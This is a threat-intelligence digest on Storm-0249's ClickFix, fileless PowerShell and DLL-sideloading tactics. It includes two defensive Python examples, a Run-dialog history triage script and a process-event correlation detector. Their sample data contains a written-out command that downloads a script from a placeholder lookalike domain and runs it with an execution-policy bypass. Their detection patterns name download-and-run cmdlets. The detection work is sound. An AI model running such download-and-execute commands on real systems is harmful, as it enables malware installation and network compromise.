Storm-0249 Adopts Advanced Tactics for Ransomware Attacks
Summary
Storm-0249, a group previously tracked as an initial access broker, has escalated its operations with a more targeted playbook: ClickFix social engineering, payload retrieval from a spoofed Microsoft domain, DLL sideloading, and fileless PowerShell execution, all in service of ransomware attacks. These methods let the actor bypass defenses, infiltrate networks, maintain persistence, and operate undetected. The group has shifted from mass phishing campaigns to more precise attacks, leveraging the trust placed in signed processes for added stealth. The ultimate goal is persistent access to enterprise networks, monetized by selling that access to ransomware gangs.
Timeline
- 09.12.2025 15:37 · 1 article
Storm-0249 Adopts Advanced Tactics for Ransomware Attacks
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
Information Snippets
- Storm-0249 is using ClickFix social engineering to trick targets into running malicious commands via the Windows Run dialog.
  First reported: 09.12.2025 15:37 · 1 source, 1 article (thehackernews.com)
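One host-side check an incident responder can run for the Run-dialog lure described above is to review the user's Win+R history, which Explorer keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The script below is an added example, not code from the article or from Storm-0249: it parses a `reg export` of that key and flags any command carrying ClickFix-style indicators. The registry export embedded in it is constructed sample data, and the lookalike hostname `update.microsoft-example.invalid` is a placeholder, not an indicator from the report.

```python
import re
from typing import Dict, List

# Constructed sample of `reg export HKCU\...\Explorer\RunMRU` (not real victim data).
# Explorer stores each Win+R command as a value a, b, c, ... with a trailing "\1";
# MRUList holds the slot letters newest-first. In .reg text, "\" and '"' are escaped
# with a backslash, so the "\1" suffix appears as "\\1". The hostname is a placeholder.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="curl.exe -s https://update.microsoft-example.invalid/r.ps1 -o %TEMP%\\r.ps1 && powershell -ep bypass -f %TEMP%\\r.ps1\\1"
"c"="\\\\fileserver\\share\\1"
"MRUList"="bca"
'''

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')

# Command-line features typical of ClickFix lures pasted into the Run dialog.
CLICKFIX_INDICATORS = [
    (re.compile(r'\bcurl(\.exe)?\b', re.I), 'curl download'),
    (re.compile(r'\b(powershell|pwsh)(\.exe)?\b', re.I), 'PowerShell launch'),
    (re.compile(r'\bmshta(\.exe)?\b', re.I), 'mshta launch'),
    (re.compile(r'https?://', re.I), 'remote URL'),
    (re.compile(r'-(ep|executionpolicy)\s+bypass', re.I), 'execution policy bypass'),
    (re.compile(r'\b(iex|invoke-expression|iwr|invoke-webrequest)\b', re.I), 'download-and-run cmdlet'),
]


def parse_run_mru(reg_text: str) -> List[str]:
    """Return the Run-dialog history from a .reg export, most recent command first."""
    values: Dict[str, str] = {}
    for line in reg_text.splitlines():
        m = VALUE_RE.match(line.strip())
        if m:
            # undo .reg escaping: "\\" -> "\", "\"" -> '"'
            values[m.group('name')] = re.sub(r'\\(.)', r'\1', m.group('value'))
    order = values.pop('MRUList', '')
    history: List[str] = []
    for slot in order:
        raw = values.get(slot)
        if raw is None:
            continue
        # strip the literal "\1" Explorer appends to every RunMRU entry
        history.append(raw[:-2] if raw.endswith('\\1') else raw)
    return history


def triage_run_mru(reg_text: str) -> List[Dict[str, object]]:
    """Flag history entries that match any ClickFix indicator, with the reasons."""
    findings: List[Dict[str, object]] = []
    for position, command in enumerate(parse_run_mru(reg_text)):
        reasons = [label for rx, label in CLICKFIX_INDICATORS if rx.search(command)]
        if reasons:
            findings.append({'mru_position': position, 'command': command, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in triage_run_mru(SAMPLE_REG_EXPORT):
        print(f"#{f['mru_position']}: {f['command']}\n    -> {', '.join(f['reasons'])}")
```

On a live host, collect the input with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` for each user profile of interest (the key lives in the user hive, so run it in that user's context or load their NTUSER.DAT). A hit at MRU position 0 shortly before the first suspicious process-creation event is strong corroboration that the initial command was typed into the Run dialog by the user rather than dropped by another process.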
- The malicious command uses the built-in curl.exe to fetch a PowerShell script from a spoofed Microsoft domain, so the download itself comes from a signed Windows binary rather than a dropped tool.
  First reported: 09.12.2025 15:37 · 1 source, 1 article (thehackernews.com)
- The PowerShell script executes a malicious MSI package with SYSTEM privileges, dropping a trojanized DLL that impersonates a component of SentinelOne's endpoint security solution so that it can be sideloaded by a legitimate signed process.
  First reported: 09.12.2025 15:37 · 1 source, 1 article (thehackernews.com)
- The rogue DLL establishes encrypted communication with a command-and-control (C2) server.
  First reported: 09.12.2025 15:37 · 1 source, 1 article (thehackernews.com)
- Storm-0249 uses legitimate Windows administrative utilities such as reg.exe and findstr.exe to extract unique system identifiers, notably MachineGuid (stored under HKLM\SOFTWARE\Microsoft\Cryptography).
  First reported: 09.12.2025 15:37 · 1 source, 1 article (thehackernews.com)
- Because every stage runs through signed, built-in Windows binaries (curl.exe, PowerShell, msiexec, reg.exe, findstr.exe), this living-off-the-land (LotL) activity is difficult to separate from routine administration when each process is judged on its own.
  First reported: 09.12.2025 15:37 · 1 source, 1 article (thehackernews.com)
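The chain in the snippets above (explorer.exe launching a command that calls curl.exe, PowerShell with an execution-policy bypass, msiexec installing a package from a per-user temp path, reg.exe and findstr.exe reading MachineGuid) is hard to catch one process at a time because each binary is legitimate; correlating the stages per host is what makes it detectable. The Python below is an added example, not detection content from the article or from any vendor: it runs five narrow rules over constructed Sysmon-style process-creation records and raises an alert only when several distinct stages fire on one host inside a short window. The events, hostnames, user names, paths and the `microsoft-example.invalid` domain are all constructed placeholders, and the rule names are this example's own.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SYS32 = "C:\\Windows\\System32\\"
TEMP = "C:\\Users\\alice\\AppData\\Local\\Temp\\"
URL = "https://update.microsoft-example.invalid/r.ps1"  # placeholder lookalike, not a real IOC


def _ev(ts, host, user, parent, image, cmd) -> Dict[str, str]:
    return {"ts": ts, "host": host, "user": user, "parent": parent, "image": image, "cmd": cmd}


# Constructed Sysmon Event ID 1 style records; hosts, users and timestamps are invented.
# The msiexec client below runs as the user; the SYSTEM-level work happens in the msiexec
# service (child of services.exe), which is normal for every install and so is not what
# the rule keys on.  Rule R4 keys on *who* launched the client and *where* the package is.
EVENTS = [
    _ev("2025-12-09T15:37:02", "ws01", "CORP\\alice", "C:\\Windows\\explorer.exe", SYS32 + "cmd.exe",
        f"cmd /c curl.exe -s {URL} -o %TEMP%\\r.ps1 && powershell -ep bypass -f %TEMP%\\r.ps1"),
    _ev("2025-12-09T15:37:03", "ws01", "CORP\\alice", SYS32 + "cmd.exe", SYS32 + "curl.exe",
        f"curl.exe -s {URL} -o {TEMP}r.ps1"),
    _ev("2025-12-09T15:37:05", "ws01", "CORP\\alice", SYS32 + "cmd.exe", PS,
        f"powershell -ep bypass -f {TEMP}r.ps1"),
    _ev("2025-12-09T15:37:09", "ws01", "CORP\\alice", PS, SYS32 + "msiexec.exe",
        f"msiexec.exe /i {TEMP}upd.msi /qn"),
    _ev("2025-12-09T15:37:20", "ws01", "CORP\\alice", SYS32 + "cmd.exe", SYS32 + "reg.exe",
        "reg query HKLM\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid"),
    _ev("2025-12-09T15:37:20", "ws01", "CORP\\alice", SYS32 + "cmd.exe", SYS32 + "findstr.exe",
        "findstr MachineGuid"),
    # benign noise on another host: an admin double-clicking an installer in Downloads
    _ev("2025-12-09T15:40:00", "ws02", "CORP\\bob", "C:\\Windows\\explorer.exe", SYS32 + "msiexec.exe",
        "msiexec.exe /i C:\\Users\\bob\\Downloads\\7zip.msi"),
]

URL_RE = re.compile(r"https?://", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule a single process-creation event matches."""
    image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmd"]
    hits: List[str] = []
    # R1: Run dialog (parent explorer.exe) starting a shell/downloader with a remote URL
    if parent == "explorer.exe" and image in SCRIPT_HOSTS + ("curl.exe",) and URL_RE.search(cmd):
        hits.append("run_dialog_remote_fetch")
    # R2: curl.exe pulling a script file to disk
    if image == "curl.exe" and URL_RE.search(cmd) and re.search(r"\.(ps1|bat|vbs|hta|js)\b", cmd, re.I):
        hits.append("curl_script_download")
    # R3: PowerShell started with an execution-policy bypass
    if image in ("powershell.exe", "pwsh.exe") and re.search(r"-(ep|executionpolicy)\s+bypass", cmd, re.I):
        hits.append("powershell_ep_bypass")
    # R4: msiexec launched by a script host, installing from a per-user temp/AppData path
    if image == "msiexec.exe" and parent in SCRIPT_HOSTS and re.search(r"\\(temp|appdata)\\", cmd, re.I):
        hits.append("msiexec_from_script_host")
    # R5: MachineGuid collection through reg.exe / findstr.exe
    if image in ("reg.exe", "findstr.exe") and "machineguid" in cmd.lower():
        hits.append("machineguid_discovery")
    return hits


def correlate(events: List[Dict[str, str]], window_seconds: int = 120, min_rules: int = 3) -> List[Dict[str, object]]:
    """Alert per host when at least min_rules distinct rules fire inside one sliding window."""
    per_host: Dict[str, list] = {}
    for ev in events:
        for rule in classify(ev):
            per_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), rule, ev["image"]))
    alerts: List[Dict[str, object]] = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= timedelta(seconds=window_seconds)]
            rules = sorted({r for _, r, _ in in_window})
            if len(rules) >= min_rules:
                alerts.append({"host": host, "first_seen": t0.isoformat(), "rules": rules})
                break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(f"{a['host']} first seen {a['first_seen']}: {', '.join(a['rules'])}")
```

Each rule on its own would be noisy in a real estate (admins use `-ep bypass`, and `reg query` is everywhere), which is why the alert threshold is on the number of distinct stages per host rather than on any one hit; tune `window_seconds` and `min_rules` against your own baseline before deploying, and feed the logic from your SIEM's process-creation table (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) rather than from the constructed list.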
- Ransomware groups such as LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems, so the identifier collected here feeds directly into the ransomware stage.
  First reported: 09.12.2025 15:37 · 1 source, 1 article (thehackernews.com)